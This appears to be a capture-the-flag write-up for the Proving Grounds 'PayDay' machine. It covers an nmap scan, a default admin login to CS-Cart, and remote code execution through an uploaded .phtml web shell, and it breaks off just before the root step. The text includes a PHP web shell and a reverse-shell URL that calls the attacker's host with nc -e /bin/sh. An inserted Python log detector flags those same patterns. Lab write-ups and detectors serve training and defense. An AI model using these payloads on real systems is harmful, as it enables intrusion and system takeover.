Payday

Introduction

This write-up details the steps taken to solve the PayDay machine from Proving Grounds Practice. The approach includes reconnaissance, enumeration, exploitation, and privilege escalation to gain root access.

Reconnaissance

Initial Nmap Scan

To begin the process, an nmap scan was conducted to identify open ports and services running on the target machine:

sudo nmap -sSCV -n -T4 -Pn -p- 192.168.249.39
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING TOP CAPA STLS SASL UIDL
|_ssl-date: 2025-03-08T10:20:32+00:00; +8s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: THREAD=REFERENCES SASL-IR completed OK MULTIAPPEND UNSELECT LITERAL+ SORT Capability IDLE LOGIN-REFERRALS LOGINDISABLEDA0001 STARTTLS NAMESPACE CHILDREN IMAP4rev1
|_ssl-date: 2025-03-08T10:20:32+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: 2025-03-08T10:20:33+00:00; +8s from scanner time.
|_imap-capabilities: THREAD=REFERENCES SASL-IR AUTH=PLAINA0001 OK MULTIAPPEND UNSELECT LITERAL+ SORT IDLE LOGIN-REFERRALS completed Capability NAMESPACE CHILDREN IMAP4rev1
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3    Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_ssl-date: 2025-03-08T10:20:32+00:00; +8s from scanner time.
|_pop3-capabilities: RESP-CODES PIPELINING TOP CAPA USER SASL(PLAIN) UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2025-03-08T05:20:24-05:00
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 50m07s, deviation: 2h02m28s, median: 7s

Enumeration

Port 80

Upon visiting http://192.168.249.39, the CS-Cart e-commerce software was detected.

A search revealed known vulnerabilities associated with CS-Cart.

Since the version was unknown, directory brute-forcing was performed using Gobuster:

gobuster dir -b 403,404 -u "http://192.168.249.39/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --no-error -t 200 -x txt,php

This revealed an administration login panel, where I tried default credentials and logged in with admin:admin.

Navigating to Administration → Upgrade Center, the CS-Cart version was identified.

A known Remote Code Execution (RCE) vulnerability was available for this version.

📌 Exploit: CS-Cart 1.3.3 Authenticated RCE - Exploit-DB (48891)

Exploitation – Gaining a Shell

A file upload weakness in the template editor was used to gain RCE: a PHP payload saved with a .phtml extension is executed by the web server.

Steps to Exploit CS-Cart RCE:

Step 1: Go to the Look and Feel section and click on "Template editor".

Step 2: Upload a malicious PHP file, renaming it to .phtml:

echo "<?php echo system('id'); ?>" > test.phtml

Step 3: Access the uploaded file:

http://192.168.249.39/skins/test.phtml

This confirmed command execution.

Step 4: Modify the script for a reverse shell:

<?php echo system($_GET['cmd']); ?>

Step 5: Start a listener on the attacking machine:

nc -nvlp 4444

Step 6: Trigger the reverse shell by visiting:

http://192.168.249.39/skins/test.phtml?cmd=nc%20192.168.45.184%204444%20-e%20/bin/sh
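As an added example (not part of the original write-up), this is detection logic a defender could run over Apache access logs to spot the pattern above: a script file served from the static /skins/ tree and then driven with a shell-like cmd= parameter. The log lines below are constructed to mirror the steps in this write-up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines modelled on the PayDay write-up:
# a .phtml dropped under /skins/ and then driven with a ?cmd= parameter.
SAMPLE_LOG = """\
192.168.45.184 - - [08/Mar/2025:05:21:10 -0500] "GET /index.php?dispatch=products.view&product_id=12 HTTP/1.1" 200 8123
192.168.45.184 - - [08/Mar/2025:05:24:02 -0500] "POST /admin.php?dispatch=template_editor.upload HTTP/1.1" 200 512
192.168.45.184 - - [08/Mar/2025:05:24:30 -0500] "GET /skins/test.phtml HTTP/1.1" 200 97
192.168.45.184 - - [08/Mar/2025:05:25:01 -0500] "GET /skins/test.phtml?cmd=nc%20192.168.45.184%204444%20-e%20/bin/sh HTTP/1.1" 200 0
10.0.0.7 - - [08/Mar/2025:05:26:00 -0500] "GET /skins/basic/images/logo.png HTTP/1.1" 200 4410
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Script extensions that should never be served from the static skins tree.
SCRIPT_EXT = re.compile(r'\.(phtml|php\d?)$', re.IGNORECASE)
# Tokens that make a decoded query value look like a shell command.
SHELLY = re.compile(r'(/bin/(ba)?sh|\bnc\b|\bbash -i\b|\|\s*sh\b)')


def analyse_line(line):
    """Return a list of (severity, reason) findings for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return []  # not a combined-format request line; ignore
    parts = urlsplit(m.group('target'))
    findings = []
    if parts.path.startswith('/skins/') and SCRIPT_EXT.search(parts.path):
        findings.append(('high', 'script file requested under /skins/: ' + parts.path))
        # parse_qs already URL-decodes the values (%20 -> space)
        for key, values in parse_qs(parts.query).items():
            for v in values:
                if SHELLY.search(v):
                    findings.append(('critical', f'shell-like {key}= value: {v}'))
    return findings


def scan_log(text):
    """Map each suspicious line (1-based index) to its findings."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        f = analyse_line(line)
        if f:
            hits[n] = f
    return hits


if __name__ == '__main__':
    for n, flist in scan_log(SAMPLE_LOG).items():
        for sev, why in flist:
            print(f'line {n} [{sev}] {why}')
```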

TTY Treatment

Once I had successfully established the reverse shell, the session was not as stable or user-friendly as it could be. The shell I obtained was non-interactive, meaning it didn't allow typical interactive tasks like tab completion, command history, or using commands like sudo properly.

To resolve this, I applied a TTY treatment to the shell, making it more stable and interactive. This was done by upgrading the shell to a fully interactive terminal with the following commands:

script /dev/null -c bash
CTRL + z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 53 columns 236

After checking the contents of patrick's home directory, I discovered the user flag.

Lateral Movement (www-data -> patrick)

Step 1: Checking MySQL Credentials

Since MySQL (3306) was running, configuration files were inspected for credentials.

Inside /var/www/config.php, the MySQL root credentials were found, but they did not yield direct privilege escalation.

Step 2: Checking User Credentials

After spending time enumerating, the username and password patrick:patrick worked for SSH login.

Privilege Escalation (patrick -> root)

Checking sudo permissions

Patrick had full sudo privileges.

This means that root access could be obtained with:
